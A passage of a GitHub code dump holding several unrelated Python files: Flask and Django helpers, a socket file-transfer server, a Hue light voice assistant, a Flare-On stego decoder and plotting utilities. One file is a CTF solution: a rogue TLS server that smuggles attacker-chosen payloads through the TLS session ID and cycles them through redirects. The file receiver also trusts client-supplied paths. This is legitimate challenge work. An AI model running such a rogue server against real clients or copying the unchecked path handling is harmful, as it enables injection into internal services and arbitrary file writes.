set the file\n file = '%s_view.html' % name\n\n # set the folder\n folder = 'app/view/'\n\n # and the path\n path = folder + file\n\n # check for the file in memcache\n view = memcache.get(path)\n\n if not view:\n # check the file exists\n if not file_helper.check(path):\n # uh oh\n raise IOError('File %s not found' % path)\n\n # set up env for the renderer\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(folder))\n\n # prepare the template\n template = env.get_template(file)\n\n # render the view\n view = template.render(data)\n\n # save it to memcache\n memcache.set(path, view)\n\n # return it\n return view","repo_name":"ahmednuaman/portfolio-space","sub_path":"app/helper/template_helper.py","file_name":"template_helper.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43432422895","text":"\"\"\"\nIn this file we are creating an islogin decoretor \nfor finding if the user is valid or not by sending\na jwt token in headerfile of application, each time\nwhen the user is requesting an api where he is dealing\nwith some sensitive information, each time we are going to\nadd this decoretor in particular routes function.\n\"\"\"\nfrom flask_restful import abort # functions abort for sending error message\nfrom flask import request # for requesting header if jwt is present or not\nfrom functools import wraps # wrap for creating decoretor\nimport jwt # jwt for creating token\nfrom api import app\nfrom db.log import Log # importing log model \nfrom db.user import User\nfrom db.post import Post\nfrom flask_jwt_extended import get_jwt_identity\nfrom extension import db\n\n\n# creating islogin decorator\ndef islogin(f):\n @wraps(f)\n def wrap(*args, **kwargs): \n auth = request.cookies.get('auth') # checking if auth is present in request header/ cookies\n \n # if present \n if auth:\n user = jwt.decode(auth, algorithms=['HS256'], key=app.config['SECRET_KEY'])\n user_id = user['user_id']\n\n else:\n # if not present\n abort(404, message=\"you are not login\")\n return f(user_id, *args, **kwargs)\n return wrap\n \n# Use this decorator on users and posts routes for tracking activity\ndef record_logs(fun):\n @wraps(fun)\n def wrap(*args, **kwargs):\n \n try:\n result = fun(*args, **kwargs)\n status_code = int(result[1])\n \n # If unsuccessful request then no need to store log\n if status_code != 200 and status_code != 201:\n return result\n\n # Get user details\n user_id = get_jwt_identity()\n user = User.query.filter_by(id=user_id).first()\n\n # Get url, method and post_id\n url = request.path\n method = request.method\n post_id = kwargs.get('post_id') if kwargs.get('post_id') else -1\n post = Post.query.filter_by(id = post_id).first()\n # Initialize with default values\n message = url\n post_type = ''\n\n if url == f'/api/v1/auth/register':\n if method == 'POST':\n message = f'New user added {user[\"username\"]}'\n \n if url == f'/api/v1/auth/login/':\n if method == 'POST':\n message = f'{user[\"username\"]} logged in'\n \n if url == f'/api/v1/post/{user_id}':\n if method == 'POST': \n message = f'{user[\"username\"]} posted someting'\n if url == f'/api/v1/post/{user_id}/update/{post_id}':\n if method == 'PUT': \n message = f'{user[\"username\"]} updated {post[\"title\"]}'\n \n log = Log(\n message=message, \n user_id=user_id, \n type=post_type,\n post_id= post_id,\n username=user['username'],\n )\n db.session.add(log)\n db.session.commit()\n return result\n \n except Exception as e:\n print('Error - ', str(e))\n return fun(*args, **kwargs)\n return wrap","repo_name":"M-A-D-A-R-A/beyondIRR","sub_path":"middleware/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"42552357115","text":"import socket\r\nimport os\r\n\r\nimport protocol_consts\r\nimport protocol_exceptions\r\n\r\nclass ReceivingServer:\r\n def __init__(self, dstdir: str) -> None:\r\n self._DST = dstdir\r\n\r\n self._HOST = socket.gethostbyname(socket.gethostname())\r\n print(\"In order for the sender machine to locate this machine in the local network, the following local IP will be needed:\", self._HOST)\r\n\r\n self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self._server_socket.bind((self._HOST, protocol_consts.PORT))\r\n self._transfer_socket = None\r\n\r\n def listen_and_connect_to_client(self) -> None:\r\n self._server_socket.listen()\r\n self._transfer_socket, client_addr = self._server_socket.accept()\r\n\r\n print(\"Sender has connected with address:\", client_addr)\r\n\r\n def handshake(self) -> None:\r\n msg = self._transfer_socket.recv(protocol_consts.BYTESIZE_MSG)\r\n if msg == protocol_consts.MSG_CLIENT_CONF:\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n print(\"Connection has been accepted by sender.\")\r\n else:\r\n raise protocol_exceptions.ServerCouldNotConfirmError(\"The receiver did not confirm the connection.\")\r\n\r\n def _receive_file(self) -> None:\r\n # File path length\r\n pathlen_bytes = self._transfer_socket.recv(protocol_consts.BYTESIZE_PATHLEN)\r\n pathlen = int.from_bytes(pathlen_bytes, \"big\")\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # File path\r\n noprefixpathname_bytes = self._transfer_socket.recv(pathlen)\r\n noprefixpathname = ''.join(map(chr, noprefixpathname_bytes))\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # File size\r\n filesize_bytes = self._transfer_socket.recv(protocol_consts.BYTESIZE_FILESIZE)\r\n filesize = int.from_bytes(filesize_bytes, \"big\")\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # File data\r\n filedata_bytes = self._transfer_socket.recv(filesize)\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # Construct local path with self._DST prefix.\r\n fulldstpath = os.path.join(self._DST, noprefixpathname)\r\n print(\"Received file:\", fulldstpath)\r\n\r\n # Make the directories needed in order to write the file and send it.\r\n os.makedirs(os.path.dirname(fulldstpath), exist_ok=True)\r\n\r\n with open(fulldstpath, \"wb\") as dstfile:\r\n dstfile.write(filedata_bytes)\r\n\r\n def receive_dir(self) -> None:\r\n nfiles_bytes = self._transfer_socket.recv(protocol_consts.BYTESIZE_NFILES)\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n for _ in range(int.from_bytes(nfiles_bytes, \"big\")):\r\n self._receive_file()\r\n\r\n def __del__(self) -> None:\r\n self._transfer_socket.close()\r\n self._server_socket.close()\r\n","repo_name":"SeanJxie/PyWirelessTransfer","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"22"} +{"seq_id":"35536291130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 20 17:55:23 2019\n\n@author: spidey\n\"\"\"\n\nfrom phue import Bridge\nfrom gtts import gTTS\nimport speech_recognition as sr\nfrom tempfile import TemporaryFile\nfrom pygame import mixer\nimport pyautogui\nimport re\nfrom random import randint\nimport webbrowser\nfrom time import sleep\n\ndef myCommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n sleep(2)\n print('Ready...')\n r.pause_threshold = 1\n r.adjust_for_ambient_noise(source, duration=1)\n audio = r.listen(source)\n try:\n command = r.recognize_google(audio).lower()\n print('You said: ' + command + '\\n')\n\n #loop back to continue to listen for commands if unrecognizable speech is received\n except sr.UnknownValueError:\n print('Your last command couldn\\'t be heard')\n command = myCommand();\n\n return command\n\ndef assistant(command):\n if 'set the mood' in command:\n lights('romantic')\n elif 'sad' in command:\n lights('sad')\n elif 'heart broken' in command:\n lights('break')\n elif 'happy' in command:\n lights('happy')\n elif 'let there be light' in command:\n lights('up')\n elif 'see you' in command:\n lights('down')\n \ndef lights(action):\n b = Bridge('10.111.14.17')\n light_names = b.get_light_objects('name')\n if action=='up':\n light_names['Hue color lamp 1'].on = True\n light_names['Hue color lamp 1'].hue = 40000\n light_names['Hue color lamp 1'].saturation = 10\n if action=='down':\n command1 = {'transitiontime' : 100, 'on' : False}\n#b.set_light(1, command1)\n#time.sleep(1)\n#command2={'transitiontime' : 100, 'on' : True,'hue' :40000, 'bri':50}\n b.set_light(1, command1)\n print('done')\n if action=='happy':\n url='https://www.youtube.com/watch?v=ApXoWvfEYVU'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n hues=[45000,40000,35000,30000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n sleep(10)\n i+=1\n if action=='sad':\n url='https://www.youtube.com/watch?v=au2n7VVGv_c'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n hues=[40000,44000,40000,44000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n sleep(10)\n i+=1\n if action=='romantic':\n url='https://www.youtube.com/watch?v=2Vv-BfVoq4g&t=20s'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n hues=[1000,10000,55000,60000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n print('excuted',i)\n sleep(10)\n i+=1\n if action=='break':\n url='https://www.youtube.com/watch?v=J9Zjgb03FMQ'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n hues=[40000,41000,42000,44000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n sleep(10)\n i+=1\nwhile True:\n try:\n assistant(myCommand())\n sleep(5)\n except KeyboardInterrupt:\n print('All done')\n # If you actually want the program to exit\n raise \n \n ","repo_name":"bathonSpidey/Nao_Personal_Assistant","sub_path":"lights.py","file_name":"lights.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32202673752","text":"import logging\nfrom gym.envs.registration import register\n\nlogger = logging.getLogger(__name__)\n\nregister(\n id='Freeciv-v0',\n entry_point='gym_freeciv_web.envs:FreecivEnv',\n #timestep_limit=1000,\n #reward_threshold=1.0,\n #nondeterministic = True,\n)\n","repo_name":"chris1869/freeciv-bot","sub_path":"src/gym_freeciv_web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"70076765497","text":"import re\r\nwhile True:\r\n s = input()\r\n if s == \"end\":break\r\n case1 = len(re.findall(\"[aeiou]\", s)) != 0 # 모음의 유무 확인\r\n case2 = len(re.findall(\"[aeiou]{3}|[^aeiou]{3}\", s)) == 0 # 모음 or 자음의 3번 연속 유무 확인\r\n case3 = len(re.findall(\"([a-df-np-z])\\\\1\", s)) == 0 # e와 o의 2번 반복 제외 반복 유무 확인\r\n\r\n if case1 and case2 and case3:\r\n print(f\"<{s}> is acceptable.\")\r\n else:\r\n print(f\"<{s}> is not acceptable.\")\r\n","repo_name":"gyocheol/baekjoon","sub_path":"백준/Silver/4659. 비밀번호 발음하기/비밀번호 발음하기.py","file_name":"비밀번호 발음하기.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"1185601854","text":"# Blatantly copied from https://github.com/dfyz/ctf-writeups/blob/master/hxp-2020/security%20scanner/fake_git.py\nimport argparse\nimport base64\nimport hashlib\nimport hmac\nimport re\nimport socket\nimport struct\nimport time\nfrom Crypto.Cipher import AES\nfrom Crypto.PublicKey import RSA\nfrom dataclasses import dataclass\nfrom pathlib import Path\nimport threading\n\n\n# RFC 5246, section 5\ndef prf(secret, label, seed, length):\n def hmac_sha256(key, msg):\n return hmac.digest(key, msg, hashlib.sha256)\n\n seed = label + seed\n\n result = b''\n cur_a = seed\n while len(result) < length:\n cur_a = hmac_sha256(secret, cur_a)\n result += hmac_sha256(secret, cur_a + seed)\n return result[:length]\n\n\ndef to_ad(seq_num, tls_type, tls_version, tls_len):\n return struct.pack('>QBHH', seq_num, tls_type, tls_version, tls_len)\n\n# Chosen by fair dice roll, guaranteed to be random.\ndef get_random_bytes(length):\n return b'A' * length\n\nclass TLS:\n # in bytes (i.e., this is 4096 bits)\n KEY_LENGTH = 512\n PKCS_PREFIX = b'\\x00\\x02'\n\n # TLS 1.2\n VERSION = 0x0303\n # TLS_RSA_WITH_AES_128_GCM_SHA256, because we don't care to support the full DH exchange.\n CIPHER_SUITE = 0x9c\n\n CHANGE_CIPHER_SPEC_CONTENT_TYPE = 0x14\n ALERT_CONTENT_TYPE = 0x15\n HANDSHAKE_CONTENT_TYPE = 0x16\n DATA_CONTENT_TYPE = 0x17\n\n FINISHED_HANDSHAKE_TYPE = 0x14\n\n @dataclass\n class Record:\n content_type: int\n version: int\n data: bytes\n\n @dataclass\n class HandshakeRecord:\n handshake_type: int\n data: bytes\n\n @dataclass\n class SessionKeys:\n master_secret: bytes\n client_key: bytes\n server_key: bytes\n client_salt: bytes\n server_salt: bytes\n\n def __init__(self, socket, priv_key, certs, session_id):\n self.socket = socket\n self.priv_key = priv_key\n self.certs = certs\n # Chosen by a fair dice roll.\n self.server_random = get_random_bytes(32)\n self.session_id = session_id\n\n self.client_seq_num = 0\n self.server_seq_num = 0\n self.handshake_log = b''\n\n self.session_keys = None\n self._shake_hands()\n\n def _read_record(self, expected_type):\n header = self.socket.recv(5)\n content_type, version, length = struct.unpack('>BHH', header)\n data = self.socket.recv(length)\n assert content_type == expected_type, f'Bad content type: got {content_type}, expected {expected_type}'\n return TLS.Record(content_type, version, data)\n\n def _write_record(self, record):\n payload = struct.pack('>BHH', record.content_type, record.version, len(record.data)) + record.data\n self.socket.send(payload)\n\n def _read_handshake_record(self, expected_type, decrypt=False):\n record = self._read_record(TLS.HANDSHAKE_CONTENT_TYPE)\n payload = record.data\n if decrypt:\n payload = self._decrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE, record.version)\n self.handshake_log += payload\n header_size = 4\n header, *_ = struct.unpack('>I', payload[:header_size])\n handshake_type = header >> 24\n assert handshake_type == expected_type, f'Bad handshake type: got {handshake_type}, expected {expected_type}'\n length = header & 0xFF_FF_FF\n return TLS.HandshakeRecord(handshake_type, payload[header_size:header_size + length])\n\n def _write_handshake_record(self, record, encrypt=False):\n header = (record.handshake_type << 24) | len(record.data)\n payload = struct.pack('>I', header) + record.data\n if encrypt:\n payload = self._encrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE)\n self.handshake_log += payload\n self._write_record(TLS.Record(TLS.HANDSHAKE_CONTENT_TYPE, TLS.VERSION, payload))\n\n def _get_server_hello(self):\n return b''.join([\n struct.pack('>H', TLS.VERSION),\n self.server_random,\n struct.pack('B', len(self.session_id)),\n self.session_id,\n # No compression, no extension\n struct.pack('>HBH', TLS.CIPHER_SUITE, 0, 0),\n ])\n\n def _get_certificate(self):\n def int16_to_int24_bytes(x):\n return b'\\x00' + struct.pack('>H', x)\n\n packed_certs = b''.join([\n int16_to_int24_bytes(len(cert)) + cert\n for cert in self.certs\n ])\n\n return int16_to_int24_bytes(len(packed_certs)) + packed_certs\n\n def derive_keys(self, encrypted_premaster_secret, client_random):\n assert len(encrypted_premaster_secret) == TLS.KEY_LENGTH\n encrypted_premaster_secret = int.from_bytes(encrypted_premaster_secret, byteorder='big')\n premaster_secret = pow(encrypted_premaster_secret, self.priv_key.d, self.priv_key.n).to_bytes(TLS.KEY_LENGTH, byteorder='big')\n\n assert premaster_secret.startswith(TLS.PKCS_PREFIX)\n premaster_secret = premaster_secret[premaster_secret.find(b'\\x00', len(TLS.PKCS_PREFIX)) + 1:]\n assert len(premaster_secret) == 48\n\n master_secret = prf(premaster_secret, b'master secret', client_random + self.server_random, 48)\n\n enc_key_length, fixed_iv_length = 16, 4\n expanded_key_length = 2 * (enc_key_length + fixed_iv_length)\n key_block = prf(master_secret, b'key expansion', self.server_random + client_random, expanded_key_length)\n return TLS.SessionKeys(\n master_secret=master_secret,\n client_key=key_block[:enc_key_length],\n server_key=key_block[enc_key_length:2 * enc_key_length],\n client_salt=key_block[2 * enc_key_length:2 * enc_key_length + fixed_iv_length],\n server_salt=key_block[2 * enc_key_length + fixed_iv_length:],\n )\n\n def _get_server_finished(self):\n session_hash = hashlib.sha256(self.handshake_log).digest()\n return prf(self.session_keys.master_secret, b'server finished', session_hash, 12)\n\n def _encrypt(self, data, tls_type):\n explicit_nonce = get_random_bytes(8)\n cipher = AES.new(self.session_keys.server_key, AES.MODE_GCM, nonce=self.session_keys.server_salt + explicit_nonce)\n cipher.update(to_ad(self.server_seq_num, tls_type, TLS.VERSION, len(data)))\n ciphertext, tag = cipher.encrypt_and_digest(data)\n self.server_seq_num += 1\n return explicit_nonce + ciphertext + tag\n\n def _decrypt(self, data, tls_type, tls_version):\n cipher = AES.new(self.session_keys.client_key, AES.MODE_GCM, nonce=self.session_keys.client_salt + data[:8])\n ciphertext = data[8:-16]\n tag = data[-16:]\n cipher.update(to_ad(self.client_seq_num, tls_type, tls_version, len(ciphertext)))\n self.client_seq_num += 1\n return cipher.decrypt_and_verify(ciphertext, tag)\n\n def read(self):\n record = self._read_record(TLS.DATA_CONTENT_TYPE)\n payload = self._decrypt(record.data, TLS.DATA_CONTENT_TYPE, record.version)\n #print(f'Got a message of length {len(payload)}')\n return payload\n\n def write(self, msg):\n payload = self._encrypt(msg, TLS.DATA_CONTENT_TYPE)\n self._write_record(TLS.Record(TLS.DATA_CONTENT_TYPE, TLS.VERSION, payload))\n #print(f'Sent a message of length {len(payload)}')\n\n def _shake_hands(self):\n client_hello = self._read_handshake_record(0x1).data\n client_random = client_hello[2:2 + 32]\n #print(f'Got client hello')\n\n self._write_handshake_record(TLS.HandshakeRecord(0x2, self._get_server_hello()))\n #print(f'Sent server hello with session id {self.session_id}')\n\n self._write_handshake_record(TLS.HandshakeRecord(0xb, self._get_certificate()))\n #print(f'Sent {len(self.certs)} certificates')\n\n self._write_handshake_record(TLS.HandshakeRecord(0xe, b''))\n #print(f'Sent server hello done')\n\n # Skip the redundant premaster secret length.\n encrypted_premaster_secret = self._read_handshake_record(0x10).data[2:]\n #print(f'Got a premaster secret')\n self.session_keys = self.derive_keys(encrypted_premaster_secret, client_random)\n\n self._read_record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE)\n client_finished = self._read_handshake_record(TLS.FINISHED_HANDSHAKE_TYPE, decrypt=True)\n #print(f'Got client finished')\n\n self._write_record(TLS.Record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE, TLS.VERSION, b'\\x01'))\n server_finished = TLS.HandshakeRecord(TLS.FINISHED_HANDSHAKE_TYPE, self._get_server_finished())\n self._write_handshake_record(server_finished, encrypt=True)\n #print(f'Sent server finished, the connection is ready')\n\n\ndef get_http_response(code, headers, content):\n headers.update({\n 'Connection': 'close',\n 'Content-Length': str(len(content)),\n })\n\n return '\\r\\n'.join([\n f'HTTP/1.1 {code} Whatever',\n '\\r\\n'.join([\n f'{k}: {v}' for k, v in headers.items()\n ]),\n '',\n content,\n ]).encode()\n\ndef run_rogue_server(key, cert, port, delay, location, payloads):\n payloads += [b'LAST_CHECK_DUMMY']\n def run():\n priv_key = RSA.import_key((Path(__file__).parent / Path(key)).read_text())\n certs = [\n base64.b64decode(''.join(\n cert_line\n for cert_line in cert.splitlines()\n if not cert_line.startswith('-')\n ))\n for cert in (Path(__file__).parent / Path(cert)).read_text().split('\\n\\n')\n ]\n\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind(('0.0.0.0', port))\n server_socket.listen(5)\n\n print('Server started.')\n\n success_printed = [False]*len(payloads)\n pi = 0\n while pi < len(payloads):\n client_socket, address = server_socket.accept()\n print(f'Got a connection from {address}!')\n\n print(f'Trying #{pi}')\n session_id = payloads[pi].ljust(32, b'\\0')\n try:\n # Sometimes throw AssertionError due to ALERT_CONTENT_TYPE at self-redirect\n tls = TLS(client_socket, priv_key, certs, session_id)\n http_request = tls.read()\n assert b'fdzz' not in http_request\n except:\n # This indicates that the previous payload redirected to the current payload.\n # Thus, we must retry previous payload.\n print(f'Retry #{pi - 1}...')\n pi -= 1\n client_socket.close()\n continue\n\n if pi > 0 and not success_printed[pi - 1]:\n print(f'Checked #{pi - 1} success. (payload {payloads[pi - 1]})')\n success_printed[pi - 1] = True\n pi += 1\n\n time.sleep(delay)\n\n headers = {\n 'Location': location + '?fdzz',\n }\n tls.write(get_http_response(302, headers, ''))\n\n client_socket.close()\n \n t = threading.Thread(target=run, daemon=True)\n t.start()\n return t\n","repo_name":"leesh3288/CTF","sub_path":"2022/goq_22s/trino/solution/albireo/TLS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"22"} +{"seq_id":"25836689222","text":"import random\nfrom django.shortcuts import render, redirect, reverse\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Subscriber\nfrom .forms import SubscriberForm\n\n\n# Create your views here.\n\n\ndef random_digits():\n \"\"\"\n generate random degits for subscriber confirmation number\n \"\"\"\n return \"%0.12d\" % random.randint(0, 999999999999)\n\n\n@csrf_exempt\ndef new_subscriber(request):\n \"\"\"\n New subscriber confirmation email and view\n \"\"\"\n if request.method == \"POST\":\n email = request.POST.get('email')\n confirmation_number = random_digits()\n Subscriber.objects.create(\n email=email, confirmation_number=confirmation_number)\n email_subject = 'Newsletter Confirmation'\n email_message = (\n 'Thank you for signing up for my email newsletter! Please complete \\\n the process by \\\n <a href=\"{}/confirm_subscriber/?email={}&confirmation_number={}\"> \\\n clicking here to confirm your registration.'.format(\n request.build_absolute_uri(\n '/confirm_subscriber/'), email, confirmation_number))\n send_mail(\n email_subject,\n email_message,\n settings.CONTACT_EMAIL,\n [email, ]\n )\n messages.success(\n request, f'A confirmation emai has been send to {email}')\n return render(request, 'home/index.html', {\n 'email': email, 'action': 'added', 'form': SubscriberForm()})\n else:\n return render(request, 'home/index.html', {'form': SubscriberForm()})\n\n\ndef confirm_subscriber(request):\n \"\"\"\n confirmation email send with a link\n \"\"\"\n sub = Subscriber.objects.get(email=request.GET['email'])\n if sub.confirmation_number == request.GET['confirmation_number']:\n sub.confirmed = True\n sub.save()\n return render(request, 'home/index.html', {\n 'email': sub.email, 'action': 'confirmed'})\n else:\n return render(request, 'home/index.html', {\n 'email': sub.email, 'action': 'denied'})\n\n\ndef delete_subscriber(request):\n \"\"\"\n Unsubscribe\n \"\"\"\n sub = Subscriber.objects.get(email=request.GET['email'])\n if sub.confirmation_number == request.GET['confirmation_number']:\n sub.delete()\n return render(request, 'home/index.html', {\n 'email': sub.email, 'action': 'unsubscribed'})\n else:\n return render(request, 'home/index.html', {\n 'email': sub.email, 'action': 'denied'})\n","repo_name":"Code-Institute-Submissions/Frangelicomk-penelope_swimwear_2022v1_OctResub","sub_path":"newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70538897017","text":"\"\"\"\nGiven 2*n + 1 numbers, every numbers occurs twice except one, find it.\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param A : an integer array\n @return : a integer\n \"\"\"\n def singleNumber(self, A):\n # write your code here\n result = 0\n for num in A:\n result ^= num\n return result\n","repo_name":"AnthonyNeu/LintCode","sub_path":"Python/Single Number.py","file_name":"Single Number.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"22"} +{"seq_id":"31963855466","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse,JsonResponse\r\nfrom datetime import datetime\r\nfrom myapp.models import District\r\n# Create your views here.\r\n\r\ndef index(request):\r\n\treturn render(request,\"myapp/index.html\")\r\n\r\ndef demo1(request):\r\n\tcontext={}\r\n\tcontext['name']='zhangsan'\r\n\tcontext['a']=[10,20,30]\r\n\tcontext['stu']={'name':'list','age':20}\r\n\tdata=[\r\n\t\t{'name':'q','sex':1,'age':40,'state':0},\r\n\t\t{'name':'w','sex':0,'age':40,'state':2},\r\n\t\t{'name':'e','sex':1,'age':40,'state':1},\r\n\t\t{'name':'r','sex':0,'age':40,'state':2},\r\n\t]\r\n\tcontext['dlist']=data\r\n\tcontext['time']=datetime.now\r\n\tcontext['m1']=100\r\n\tcontext['m2']=20\r\n\treturn render(request,\"myapp/demo1.html\",context)\r\ndef demo2(request):\r\n\treturn render(request,'myapp/demo2.html')\r\n\r\ndef showdistrict(request):\r\n\treturn render(request,\"myapp/district.html\")\r\n\r\ndef district(request,id=0):\r\n\tdlist = District.objects.filter(pid=id)\r\n\tmylist = []\r\n\tfor ob in dlist:\r\n\t\tmylist.append({'pid':ob.pid,'district_name':ob.district_name})\r\n\treturn JsonResponse({'data':mylist})","repo_name":"MAYI-CL/demo","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"765913257","text":"# Retrieve encoded string from sprite.bmp\n# See repository LICENSE\n\nf = open('sprite.bmp', 'rb')\nf.seek(54)\nsprite_data = f.read()\nf.close()\n\nblock_str = ''\n\nfor i in range(13):\n block_bytes = sprite_data[i*7:i*7+7]\n block_bits = list(map(lambda x: x & 1, block_bytes))\n block_chr = chr(sum([bit << (6 - j) for (j, bit) in enumerate(block_bits)]))\n block_str += block_chr\nprint(block_str)","repo_name":"LeoCodes21/ctf-writeups","sub_path":"Flare-On 2020/06-codeit/bmp_stego_decoder.py","file_name":"bmp_stego_decoder.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"22"} +{"seq_id":"5662907623","text":"from sortedcontainers import SortedList\n\n\nclass Solution:\n def minAbsoluteDifference(self, nums: List[int], x: int) -> int:\n myList = SortedList()\n n = len(nums)\n res = float('inf')\n for i, num in enumerate(nums):\n myList.add(num)\n if i + x < n:\n l = myList.bisect_left(nums[i + x])\n if l == len(myList):\n res = min(res, abs(nums[i + x] - myList[l - 1]))\n else:\n res = res = min(res, abs(nums[i + x] - myList[l - 1]), abs(nums[i + x] - myList[l]))\n\n return res","repo_name":"KaiKaizxc/Data-stuctures-and-algo","sub_path":"BinarySearch/2817. Minimum Absolute Difference Between Elements With Constraint.py","file_name":"2817. Minimum Absolute Difference Between Elements With Constraint.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"22023869773","text":"from typing import Annotated\n\nfrom fastapi import Depends, Security\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\nfrom ghga_service_commons.auth.context import AuthContextProtocol\nfrom ghga_service_commons.auth.ghga import AuthContext, is_active\nfrom ghga_service_commons.auth.policies import require_auth_context_using_credentials\n\nfrom wps.adapters.inbound.fastapi_.dummies import auth_provider\n\n__all__ = [\"RequiresAuthContext\", \"RequiresWorkPackageAccessToken\"]\n\n\nasync def require_active_context(\n credentials: Annotated[\n HTTPAuthorizationCredentials, Depends(HTTPBearer(auto_error=True))\n ],\n auth_provider: Annotated[AuthContextProtocol[AuthContext], Depends(auth_provider)],\n) -> AuthContext:\n \"\"\"Require an active GHGA auth context using FastAPI.\"\"\"\n return await require_auth_context_using_credentials(\n credentials, auth_provider, is_active\n )\n\n\nasync def require_access_token(\n credentials: Annotated[\n HTTPAuthorizationCredentials, Depends(HTTPBearer(auto_error=True))\n ],\n) -> str:\n \"\"\"Require an access token using FastAPI.\"\"\"\n return credentials.credentials\n\n\n# policy that requires (and returns) an active auth context\nRequiresAuthContext = Annotated[AuthContext, Security(require_active_context)]\n\n# policy that requires (and returns) a work package access token\nRequiresWorkPackageAccessToken = Annotated[str, Security(require_access_token)]\n","repo_name":"ghga-de/work-package-service","sub_path":"src/wps/adapters/inbound/fastapi_/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38186506119","text":"import numpy as np\nimport pickle\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport string\nimport random\n\ndef compare_plot(x1:np.ndarray,y1:np.ndarray,x2:np.ndarray,y2:np.ndarray,\n xlabel: str,ylabel:str,title:str,label1:str,label2:str):\n \n if (x1.shape != y1.shape) or (x2.shape != y2.shape):\n return None\n else:\n fig, ax = plt.subplots()\n ax.plot(x1, y1, 'b', linewidth = 4, label=label1)\n ax.plot(x2, y2, 'r', linewidth = 2, label=label2)\n ax.set(xlabel=xlabel, ylabel=ylabel, title=title)\n ax.legend()\n return fig\n\ndef parallel_plot(x1:np.ndarray,y1:np.ndarray,x2:np.ndarray,y2:np.ndarray,\n x1label:str,y1label:str,x2label:str,y2label:str,title:str,orientation:str):\n if (x1.shape != y1.shape) or (x2.shape != y2.shape) or min(x1.shape) == 0 or min(x2.shape) == 0:\n return None\n if orientation == '-':\n fig, (ax1, ax2) = plt.subplots(2,1)\n elif orientation == '|':\n fig, (ax1, ax2) = plt.subplots(1,2)\n ax1.plot(x1, y1)\n ax1.set(xlabel=x1label, ylabel=y1label)\n ax2.plot(x2, y2)\n ax2.set(xlabel=x2label, ylabel=y2label)\n fig.suptitle(title)\n return fig\n\ndef log_plot(x:np.ndarray,y:np.ndarray,xlabel:str,ylabel:str,title:str,log_axis:str): \n if x.shape != y.shape:\n return None\n fig, ax = plt.subplots() \n ax.plot(x, y)\n ax.set(xlabel=xlabel, ylabel=ylabel, title=title)\n if log_axis == 'x':\n ax.set_xscale('log')\n elif log_axis == 'y':\n ax.set_yscale('log')\n else:\n ax.set_xscale('log')\n 